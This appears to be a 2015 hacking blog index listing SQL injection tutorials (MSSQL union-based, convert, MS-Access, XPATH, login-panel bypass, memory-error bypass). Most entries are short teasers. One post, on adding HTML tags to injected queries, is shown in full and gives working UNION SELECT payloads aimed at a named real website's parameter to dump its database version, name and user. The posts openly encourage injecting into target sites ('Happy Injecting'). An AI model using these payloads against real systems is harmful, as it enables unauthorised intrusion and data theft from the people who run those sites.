Social Icons

Wednesday 22 July 2015

MSSQL Union Based Injection Part-2 - Advanced Method

MSSQL Union Based Injection Part-2 - Advanced Method
In Our Previous Tutorials About MSSQL injection we Have Cover the Basic Things.
MSSQL UNION BASED INJECTION
MSSQL INJECTION USING CONVERT
MS-ACCESS INJECTION
In This Tutorial You Will Learn Some Advanced Method that will help you in Injecting.

Tuesday 21 July 2015

MSSQL Injection Using Convert

MSSQL Injection Using Convert
In our Previous Tutorial we Have Discuss About MSSQL Union Based Injection
Now Let's Come To the Next Part. In this Tutorial You Will Learn About Injecting Site with Convert Attack.
How Actually This Command Work.This command works between two Data types and we have to give Commands to the Server with Convert then it will give That Specific Data which we have execute in the Command.

Monday 20 July 2015

MS-Access Injection -Tutorial

MS-Access Injection -Tutorial
In this Tutorial You Will learn How to inject into MS Access Database.
So we will start Our Injecting Manually.First we have to check if Our Target site is Vulnerable .So we will use Regular injecting Type and add Single Quote ' at the end of the Parameter.

Sunday 19 July 2015

MSSQL Union Based Injection -Step by Step Guide

 MSSQL Union Based Injection -Step by Step Guide
In our Previous Tutorials we Have Discuss about MySQL and a lot of Methods of Injecting In MySQL Database.Now Let's Come To injecting MSSQL Database.
In this Tutorial we Will Discuss About MSSQL Union Based injection.Although MSSQL injection is Similiar to MySQL but Not The Same As MySQL Is Easy than MSSQL Injection.

Friday 17 July 2015

XPATH Injection in Login Panel

XPATH Injection in Login Panel
In Our Previous Tutorial we have Discuss about Bypassing Login Panel With SQL Queries
But some Times when we Found SQL injection Vulnerability In Login Panel And after Executing SQL Queries There, it doesn't Give Access To the login Panel.So in SUCH cases we Will Inject The Login Panel With XPATH injection and dump admin Details from Login Panel.

Wednesday 15 July 2015

XPATH Injection Using UPDATEXML



XPATH Injection Using UPDATEXML
After the Discussion About XPATH Injection Using ExtractValue
Now Let's come to the Next Part. in This Tutorial you Will Learn About XPATH Injection Using UPDATEXML .
Each Site use Different Firewalls To Protect their Databases.in XPATH injection Some sites use UPDATEXML and they have Block The ExtractValue Function.So we can use there XPATH Injection With UPADTEXML.

Tuesday 14 July 2015

XPATH Injection Using Extractvalue

XPATH Injection Using Extractvalue

In This Tutorial we will Discuss about XPATH Injection Using Extractvalue
While We are injecting a Site and Then Come to the UNION BASED part .When we Execute Union Based Query meanwhile we Got There a ERROR Message
"The used SELECT statements have a different number of columns"
so we Used There XPATH injection.

Sunday 12 July 2015

Bypassing Login Panel with SQL Queries



Bypassing Login Panel with SQL Queries

Bypassing Login Panel with SQL Queries Tutorial By RAi Jee
In This Tutorial you Will  Learn How to Bypass Login Panel with SQL Injection Queries.
So Actually we give our SQL evil Queries in Admin Panel And Then The Server Filter Our Command  and give us Access To the Admin Panel without using any username or Password.

Saturday 11 July 2015

Adding HTML Tags in SQL Queries

Adding HTML Tags in SQL Queries
Adding HTML Tags in SQL Queries - Tutorial by RAi Jee
HTML Tags can be used For a lot of Fun in SQL Queries . We Can use HTML Tags to Make Color full Result in Output.Sometimes we are injecting A site and The Vulnerable Columns is in Title or in Source Page so we Can also Use HTML Tags There to Show Output on The Page.
So We Will Start Adding HTML Tags For making Output Some Color Full.
Here is a example. We wanna Print The version in RED Color So Here is our HTML TAG for Showing the Version in RED Color . 
 <font color=red>

Concat(OUR_HTML_TAG,QUERY_HERE)

lets See the  Result.Before Executing The Query First Encode HTML TAG in Hex Value or Use Single Quote Before and After The HTML Tag To Make it Executable

http://www.kimclement.com/basiccal/event.php
?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('<font color=red>',version()),8,9--+

Adding HTML Tags in SQL Queries
And You can See the Version is in RED color. if we Wanna use Diffirent Colors for Each Command Like Displaying Version in RED Color ,Database in Green Color,User in Blue Color so will use Different HTML Tags for each Tasks.
See Example .
Concat(Version RED Color ,Database in Green Color,User in Blue Color)
HTML Tags For Each Task:
Red color: <font color=red>
Green Color: <font color=green>
Blue Color: <font color=blue>
So Our Final Query For Displaying Each task in Different color Will be,
Concat(<font color=red>,version(),<font color=green>,database(),<font color=blue>,user())
See Example.
http://www.kimclement.com/basiccal/event.php
?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('<font color=red>',version(),0x3a,'<font color=green>',database(),0x3a,'<font color=blue>',user()),8,9--+

Adding HTML Tags in SQL Queries
And See the picture all Tasks Are complete .In this way You Can Also Display Tables and Columns in different Colors.
After Displaying SQLi Commands in Different Colors .
Now Let's See how Can We Display Data When our Vulnerable Column is in Source Page or in TiTLE  Using HTML TAGS.
When Vulnerable Column is in Source Page.
Concat(STARTING_HTML_TAG,OUR_QUERY,ENDING_HTML_TAG)
so we will use this HTML TAG for Displaying Data on the Page if Our Vulnerable Columns is in Source page.

HTML TAG:Concat(<font size="8" color="red">,Version(),</font>) 

and sometimes our Vulnerable Column is in Title so in that case we will use this HTML Tag to Print Data on the Webpage

HTML TAG:Concat(</title>,Version())

use these HTML Tags after encoding in Hex Value or PUT Single Quote before and after the HTML Tag to make the Query Executable.
Happy Injecting !!
AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee

Friday 10 July 2015

Post Parameters Injection Through Live HTTP Headers

Post Parameters Injection Through Live HTTP Headers
 Post Parameters Injection Through Live HTTP Headers - Tutorial By RAi Jee
In This Tutorial You Will Learn How to Inject a Website Through Post Parameters with Live HTTP Headers.
First You Need Live HTTP Headers Addon installed in Your Browser if Dont have This Addon Than You Can Installed it From This Link.

Wednesday 8 July 2015

Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial

Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial

Bypassing Incorrect usage of UNION and ORDER BY -Tutorial By RAi Jee
In Previous tutorial we Have Discuss about
Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted
Today's our Topic is how can we Bypass the Incorrect Usage of UNION and ORDER BY .
So Lets start our Manual Injection .Our Target Site is Vulnerable To SQL Injection.

Tuesday 7 July 2015

Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted -Tutorial



Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted


Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted -Tutorial By RAi Jee

In This Tutorial You Will Learn How To Bypass the Error Allowed Memory Size of XXXX Bytes Exhaustes.

While Injecting we came to site which Gives us The Error Of Allowed Memory Size of XXXX Bytes Exhausted when we BUILD our Union Based Query.
This Error occurs Because of That PHP doesn't Left any allowed Memory.There Are a lots of Possible Causes you can Find on our Chaachu Google.